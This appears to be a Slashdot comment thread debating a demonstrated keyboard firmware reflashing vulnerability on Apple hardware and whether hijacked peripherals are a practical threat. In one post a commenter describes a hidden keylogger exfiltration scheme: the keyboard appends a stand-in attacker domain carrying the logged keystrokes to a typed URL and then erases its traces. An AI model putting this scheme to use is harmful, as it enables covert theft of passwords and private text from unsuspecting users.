Hack request!!

[erroneus]

Hopefully some of the keyboard hackers read slashdot. I would like to request a function added to the keyboard that senses certain "L33T" speak words and automatically backspaces and substitutes REAL words in its place. Some parents might even like to see such a function that senses curse words and substitutes +%$#"!! for matching words... could even be marketable...hrm?

Re:Hack request!!

[robkore]

Hopefully some of the keyboard hackers read slashdot. I would like to request a function added to the keyboard that senses certain "L33T" speak words and automatically backspaces and substitutes REAL words in its place. Some parents might even like to see such a function that senses curse words and substitutes +%$#"!! for matching words... could even be marketable...hrm?

And while we're at it, translate 'u' to 'you', 'r' to 'are', etc... God I hate my friends.

Re:Hack request!!

[fatalwall]

I think parents would rather have it send them logs in relation to key. That way they can catch there 13 year old daughters from meeting up with 30 year old men
The functions you describe would probably work a LOT better from the application level anyways. As having the keyboard send a backspace could be bad if the user changes the location of the cursor or if they change windows.. aka you could end up replacing the wrong thing.

Re:Hack request!!

[grcumb]

Hopefully some of the keyboard hackers read slashdot. I would like to request a function added to the keyboard that senses certain "L33T" speak words and automatically backspaces and substitutes REAL words in its place. Some parents might even like to see such a function that senses curse words and substitutes +%$#"!! for matching words... could even be marketable...hrm?

So, like, a Perl interpreter, then?

Flashing should be disabled without a HW switch

[davidwr]

Most hardware should have the flash locked in read-only mode, unlockable only by pressing a specific button on the hardware that's tied to a write-enable wire.

There are obvious exceptions - hardware that needs to be flashed routinely, hardware which is inaccessible by wire and controlled by radio, etc. For those devices, other mechanisms to protect from rogue flashes must be in place.

Re:What about Bluetooth?

[ArundelCastle]

TFA and commenters are talking USB (interesting that it applies to laptops too), but what about the other half of Apple's inventory with Bluetooth. Same? I assume it has the same exploitable flash. But how old a model can it be? I haven't read the PDF, sorry... figured TFA would echo Bluetooth if it was mentioned, since that would be a super easy way to swap out someone's keyboard physically or broadcast a firmware update.

Much easier way...

[Longjmp]

I only need two keystrokes to hack a Mac when I have access to its keyboard:
Cmd - "s"
Voila, root access. documented here :p Start into single user mode

Re:Much easier way...

Unless...I have set the EFI password to stop you from booting into single user mode or booting from CD or from booting to target disk mode.

Re:Much easier way...

[konohitowa]

ZOMG! I've got the same hack on Linux! (dogs and cats... they're actually living together...)

Comment removed

[account_deleted]

Comment removed based on user account deletion

Keylogger or Installer

[ae1294]

Bet you could infect a keyboard and have it reinfect the computer ever time you try and format / reinstall your OS...

Re:Keylogger or Installer

[metaforest]

With what? you have almost no extra room in the keyboard micro to even add a keylogger, and you are suggesting a hostile take over of the host?

Good luck with that.

Re:Keylogger or Installer

[ae1294]

With what?

I've not looked into it but I would guess; admin access while OS is installing, and system dll's for things like auto update to fetch code from the internet...

It might not be enough room right now but that on keyboard storage space will increase over time so it might be a good idea to keep in mind no???

Re:Keylogger or Installer

[metaforest]

Maybe you should look into it? Developing firmware for embedded systems is something I do as a regular part of my life. And evaluating how these peripheral systems interact with hosts is essential information in assessing a new threat. To be fair I didn't expect this specific attack, but at the same time it did not surprise me.

It's been possible for a long time to conscript peripherals. So why hasn't it been more common? Key reason..... too many unknowns.

And how is a passive device like an HID going to get notified that the host is ready to accept input and which input it is expecting to receive? HID has no visibility to the context of the rest of the system that it is attached to. That information can only come from the monkey at the keyboard. And if the monkey sees said HID doing something when it should not be.... and again the HID has no idea if the monkey is watching, then how is it going to pull of taking over, with less than 1K of code space? While atm there is a potential threat for keylogging.... not much more would fit in the margins.

I do not see a keyboard getting more resources than it has now. The economics of a keyboard will not allow for it.... Typically the resources for a specific function diminish over time to save costs.

While other devices will be compromised each in turn to create new vectors, how is any different than what is going on now in the OS space?

Just because some highly skilled Blackhat finds, and demo's a half-assed exploit, does not mean that that it's going to be practical to exploit on a larger scale....

That the exploit was demoed on a Mac is more telling than the notion that any number of non-mac systems are vulnerable to the same exploit.

As other's have pointed out this exploit can only be applied when your system has already been compromised by a far more serious threat. Ignoring that potential makes any further discussion of this vector moot.

Re:Keylogger or Installer

[mikiN]

Think outside the box, analyze patterns.

An example (somewhat better worded than the one I gave in an earlier post, I hope) as seen from the keyboard's perspective:

- Wait for the user to finish typing in a (simple) URL by hitting the Enter key.
    (Most often, the cursor is now in the URL bar of a browser, It could be that the user is just typing a note or an email, but there are solutions to that, too.)
    Example: google.com
- Add a string consisting of ".[name of server]/s=[URL encoded string containing keylog buffer]" .
    Example of the final URL: google.com.pwned.org/s=Logged%20Data%20In%20Buffer
- Add an Enter
- Perhaps wait a tiny amount of time for the browser to start connecting to the site
- Now, for cleanup in case the user is just writing a document, send the appropriate number of [Delete Word] keystrokes, to restore the URL to the user's original input (on a PC, this would be Ctrl-Backspace, not ^W because this often closes the current window

Note: of course the keyboard should send the data as quickly as possible to give the user no chance to abort the operation by unplugging it.

The virtual website at google.com.pwned.org (mapped from *.pwned.org) could redirect the user to google.com, but since the data has already been sent, this doesn't matter very much.

Re:Keylogger or Installer

[metaforest]

It's going to give itself away pretty quickly.
And with all the XSS going around these days, you think a semi savvy user isn't going to notice a sudden unexpected redirect?
My history is going to point to the domain I visited, and contain the URL the hackeyboard built.... I would quickly change my keyboard and hunt the asshat down. "Release the hounds!!!!"

I type URLs by hand in a lot of different contexts... about half of which are not directed at the browser. So it wouldn't take long for this exploit to get caught adding text to a URL in the wrong context.

And you can tell me to think outside the box all you want, but the exploit and it's cockroach-ninja state machine have to fit INSIDE a very tiny box that has almost no resources to support such code.

This exploit doesn't get to log enough keystrokes to get more than my local password and a few sentences of my first email of the day. The state machine would have a rough time figuring out what to keep and what to junk due to it's very limited foot print.

Good luck with that.

Re:Keylogger or Installer

[ae1294]

Maybe you should look into it? Developing firmware for embedded systems is something I do as a regular part of my life. And evaluating how these peripheral systems interact with hosts is essential information in assessing a new threat. To be fair I didn't expect this specific attack, but at the same time it did not surprise me.

Wait what? You develop firmware but you never expected this kind of threat? And you're trying to say maybe I should look into it? Didn't surprise you? Well I'd hope after working with computers for more than awhile nothing should surprise you or anyone else so that's not really saying anything.

So why hasn't it been more common? Key reason..... too many unknowns.

What do you base this on? Maybe it is common? No one has been looking for it right? And why are there too many unknowns? Only a few companies make these chips and the system tells you what is connected to computer X so anyone who really wanted to compile a list could have different firmwares on there p2p botnet couldn't they? If nothing else they could break a bunch of your stuff. Remap keyboard scan codes or some other silliness...

Yes 1K isn't a lot to work with in C or Visual Basic but in ASM it's a lot more iffy isn't it...

My unwashed masses guess is now that someone has proved you can screw with people's keyboards that others are going to play with the idea and you will be eating your words in a few months, ie pretending you never said what you have.

I do not see a keyboard getting more resources than it has now. The economics of a keyboard will not allow for it.... Typically the resources for a specific function diminish over time to save costs.

That is plain wrong. Why do I have a 4 core 3Ghz processor for the same price I paid for a 386sx chip? You should know better, more and more random stuff gets thrown on these controller chips over time and sooner or later there is no cost difference between the good enough one and the one with all the extra junk so the good enough one stops getting made. NO ONE can honestly say they know that keyboards will never get more resources just because of this. It's like saying 640k is more than anyone will ever need and we will never need more than a 1gb HD.

That the exploit was demoed on a Mac is more telling than the notion that any number of non-mac systems are vulnerable to the same exploit.

I'm no mac fan but I really don't think it was demoed on a Mac because no other kind of keyboards would have worked since Mac's use the same parts now as normal PC's, I think you missed the inside joke there son, Mac people scream from the roof tops that their computers can't get infected with malware....

Everything else you said sounds like your ego is witting checks your ability can't cash..

Re:Keylogger or Installer

[ae1294]

It's going to give itself away pretty quickly.

To whom? You? My grandmother? the 16 year old girl using myspace? Have you seen a malware infected computer? It's almost unusable yet normal people keep using it and have no idea there is spyware watching them... Climb down from your tower sometime and visit some non-tek people out in the real world. It's Scary...

And with all the XSS going around these days, you think a semi savvy user isn't going to notice a sudden unexpected redirect?
My history is going to point to the domain I visited, and contain the URL the hackeyboard built.... I would quickly change my keyboard and hunt the asshat down. "Release the hounds!!!!"

So what you are saying is you are the grand master of computers... OK great... What is your point??? Most people don't know what a folder is let alone that they have a browser history...

And you can tell me to think outside the box all you want, but the exploit and it's cockroach-ninja state machine have to fit INSIDE a very tiny box that has almost no resources to support such code.

The keylogger fit inside just fine didn't it? You are trying to argue that something isn't possible or useful just because you can't think of a way to make it so. Maybe you just aren't that smart? You already said you work with this stuff but didn't expect this exploit. I think that says a lot.

This exploit doesn't get to log enough keystrokes to get more than my local password and a few sentences of my first email of the day. The state machine would have a rough time figuring out what to keep and what to junk due to it's very limited foot print.

Proof of concept is way different than end-user (script kiddy) ready. You claim to work with firmware but you don't even understand that concept?

Good luck with that.

Good luck with keeping your job by ignoring something that directly effects you and the company you work for. We can only hope that hackers keep picking the low hanging fruit and don't start reflashing all of our shit with there 'it's funny' code...

Re:Keylogger or Installer

[metaforest]

You wanna spread FUD. Go for it. Peace out.

Re:Keylogger or Installer

[ae1294]

You wanna spread FUD. Go for it. Peace out.

Very sorry I upset you with a debate.... Next time I will not reply to a post disagreeing with my post.... Really I promise...

Re:Keylogger or Installer

[metaforest]

Look, ae1294, attacking my credibility is a bullshit debating tactic.

You clearly don't understand the practical limitations of working in computing spaces so small that there is nowhere near enough room for printf(), let alone any useful subset of glibc. Some of these systems are so resource constrained that they cannot be programmed in anything but their native machine language. They simply do not have the resources to handle the overhead of even a minimal C-runtime. For most HID implementations, it takes a significant amount of shoehorning to get a USB stack running, and still have enough room for your app.

To be sure, drive-by re-flashing of peripherals is a serious threat. However, the demoed exploit on this particular keyboard doesn't get an attacker very far. There is plenty of low hanging fruit at the OS level, making such exploits largely an academic exercise.

Hardware vendors do need to start taking more proactive steps to secure their firmware upgrade processes. And the approach could be very simple in some cases, or very difficult depending on the amount of user interaction that the OEM is willing to risk. Typically more user interaction is risky as it can cause bricking, or increased support calls from users who do not understand the steps.

Keyboards, and many HID units are extremely cost sensitive products. Adding the extra code space, and ram to implement robust re-flash authentication might easily break the budget for the device. In most cases the risk that an attacker can deploy a viable exploit (as opposed to a tech demo) is very low.

For larger embedded peripherals, with more substantial resources, present a higher risks to the host. I believe that authenticated re-flashing is eventually going to be mandatory. From a business perspective, the potential for increased customer support issues due to compromised peripherals is going to be the driver. User security rides shotgun in that analysis.

  I worry more about having my RAID controller, HDD, DVD, video card, or BIOS re-flashed, than my keyboard. Those devices present a greater win for an attacker than an HID unit.

These attacks all require that the host is already profoundly compromised. If an attacker already has your system by the 'short hairs' why bother with trying to shoehorn additional malware into a small subset of exploitable peripherals the target might have attached to the system? The system is already pwnd. Beyond hooking the BIOS, which is also a dubious exploit at best, why would a criminal dev team bother?

  As much as people complain about the iPhone being a closed platform, the fact that it can be jailbroken shows how difficult and expensive securing an embedded system can be, and how little comparable effort a determined attacker needs to expend.

The key point here is motivation. For a keyboard exploit I just don't see that it's going to generate much motivation.

Re:Keylogger or Installer

[ae1294]

Look, ae1294, attacking my credibility is a bullshit debating tactic.

Maybe, but it works well in the real world, on TV, in congress, court rooms, pretty much everywhere and you said some stuff that didn't make any sense soooo well you know...

nowhere near enough room for printf(), let alone any useful subset of glibc

I mentioned 'ASM' or 'machine code' in one of my messages and I didn't expect anyone to use C to begin with, 1k and all...

Everything else you said sounds much more logical and agreeable in the rest of this post.

Re:Keylogger or Installer

[metaforest]

I didn't change my opinion from post to post.

So now you agree with me. Thats nice.

What this really come down to is:

The meaning of the communication is the result I got.

I'll be sure and spell it out for you in the future the first time.

Re:Keylogger or Installer

[ae1294]

Before -

Just because some highly skilled Blackhat finds, and demo's a half-assed exploit, does not mean that that it's going to be practical to exploit

And you can tell me to think outside the box all you want, but the exploit and it's cockroach-ninja state machine have to fit INSIDE a very tiny box that has almost no resources to support such code.

Good luck with that

After -

To be sure, drive-by re-flashing of peripherals is a serious threat

Hardware vendors do need to start taking more proactive steps to secure their firmware upgrade processes.

Shrug, alright?
Yes we've always been at war with eurasia...

Re:Keylogger or Installer

[metaforest]

You conveniently take my quote out of context. I was talking about specifically about the keyboard hack in the earlier post.

But then you know that...

Fuck off.

Re:Keylogger or Installer

[ae1294]

take my quote out of context. I was talking about specifically about the keyboard hack.

O... then I retract my previous agreement with you... I was under the impression that you had come round and realized that since someone has demonstrated a working firmware keylogger that you had come to your senses as someone who claims to work on firmware everyday for what I guess would be a business somewhere. Thus realizing that everyone should start taking this 'generalized firmware threat' serous. They should have been doing this all along but eh...

In my opinion, all devices should have a jumper, switch or button that keeps firmware write protected. A button that turns off this protection for 30 minutes would add a trivial amount to the cost of a product and, I for one, would be willing to pay the extra 2 cents for the peace of mind.

Fuck off.

and I am only saying that because I care - there's a lot of decaffeinated brands on the market that are just as tasty as the real thing. http://www.imdb.com/title/tt0089886/quotes

All jokes aside, I am truly sorry that I have caused you such grief, I was trying to point out that this is a REAL problem and NEEDS to the addressed before some jackass hacker starts turning my nice new toys into trash or something much worse like a keylogger or infection vector.

I can understand that as a firmware developer you would rather see your work used for evil... O wait... No I really can't understand that, where-in lies my confusion.

Re:Keylogger or Installer

[ae1294]

I mean really... A keyboard firmware, Keylogger... Isn't that a bit ironic, doncha think???

Heh

[JoeCommodore]

I just bought all cheap PC keyboards to replace the aging mac keyboards. mainly because the mac ones are way too expensive... ~$40. Also because all the Mac keyboards have been a point of irritation- from being bright white with clear housing (sure shows crumbs well) to having non-traditional keys (new ones ala mac book keyboard) they just aren't good for the real work environment.

That's not a bug.

That *is* a feature. It isn't a hacked battery, it is a battery which is hacked to appear as an authentic internal tool, designed to read a certain area on a memory stick, so sony can quickly restore a problematic psp.

It was designed that way, and obscured. the 'hack' merely makes that information public and usable.

Re:That's not a bug.

[poopdeville]

It isn't a hacked battery, it is a battery which is hacked... ...

Re:That's not a bug.

Literally hacked, you gotta cut a wire to make the battery appear to be a maintenance battery.

Re:That's not a bug.

[mikiN]

What's up next, maintenance heated USB slippers? maintenance HDMI cables?

Security by this kind of obscurity is going to kill us all.

"You know, I bought this USB pogo stick for my Wii, and after using it for a while, my bank account got berserk. The bank manager told me that the pogo stick must have raided my bank account while I was trying out this new online banking thingy on the Wii..."

No...

[Bat+Country]

It might run "Pitfall!" though.

perhaps the same people

who have infiltrated factories that make digital USB picture frames and inserted viral code in their mass storage?

Lies!

[Yeechang+Lee]

I use an Apple key/b/ r00lzboard anCredit Card Transaction CompleteddI've never seen aHAHA U BN PWN3Dnything like this happen. More anti-Apple proparickrolledganda!

On the plus side ...

[Sean+D.+Solle]

... at least there's now a chance of someone fixing that bloody Caps Lock delay

Update it

Apple has had flash updates for their keyboards before. So they have another one to fix this problem. if it really is a problem. Lots of so called mac hackers have claimed exploits that are not real.

OpenBSD?

[xdor]

I want to know if OpenBSD thought of this already and blocked it, or if this is their 3rd hole

Re:OpenBSD?

There is no keyboard in a default install of OpenBSD.

if this works on their Bluetooth keyboard

[vaporland]

could be even more interesting!

Additional Information

[vaporland]

Notes

1. If you do not develop software, verbose and single-user modes are only needed when troubleshooting the computer for a startup issue.
2. You cannot enter single user or verbose mode if the computer owner or administrator has enabled Open Firmware Password Protection.*
3. When in single-user mode, the keyboard layout is US English.

* I do on my MacBookPro...

Re:Too much work

[toddestan]

That doesn't mean there is anything complex going on in the keyboard itself. They could do something as simple as shorting one of the pins on the ribbon cable to ground to tell the controller that it's a UK layout.

Should HW Vendors block (unsigned) Firmwares?

[Val314]

So what does /. thinks?
-) Block all unsigned Firmware, locking out the hacker community for the sake of "security"?
-) Allow hacks and custom firmware? (with the possibillity of security issues)
-) think: my Firmware will never have any bugs, i'll put in a ROM (with the risk of recalling the HW when a serious issue is found)

YAGT: Yet Another Gelded Trojan

[macs4all]

As I see it, this requires Social Engineering to work, and is therefore only possible through the use of a Trojan.

1. If you are using Apple's keyboard updater/bootloader, then THAT has to run on the intended victim's machine. That requires either physical access or the use of a Trojan to dupe users into typing an admin. password. In both cases, that's not as easy as it sounds.

2. If you (as hacker) have reverse-engineered Apple's keyboard bootloader protocol and written your own updater/bootloader (that would be crafted to not require as password), then you STILL need to get the user to run that ON THEIR MACHINE. Again, you need either physical access or a Trojan.

Re-Boot

Would the fix be this easy? On boot the OS re-flashes USB devices with the current correct instruction set? On a sophmoric level, it does seem someone is Apple bashing for an issue that is not limited to their products.

Re:Re-Boot

[mikiN]

If it is still true that Flash memory lasts a limited number of write cycles, reflashing on every boot would eventually kill your devices.

I think it would be better to (periodically) checksum all firmware on devices and raise an alarm if there is any mismatch.

Emily

[Impy+the+Impiuos+Imp]

> The vulnerability was discovered by K Chen

That guy's a fucking idiot! He couldn't think his way out of a paper bag.

Oh, wait. I thought you said K Fed. n/m

Re:Too much work

You(r Coke) just hacked a keyboard.
Congratulations!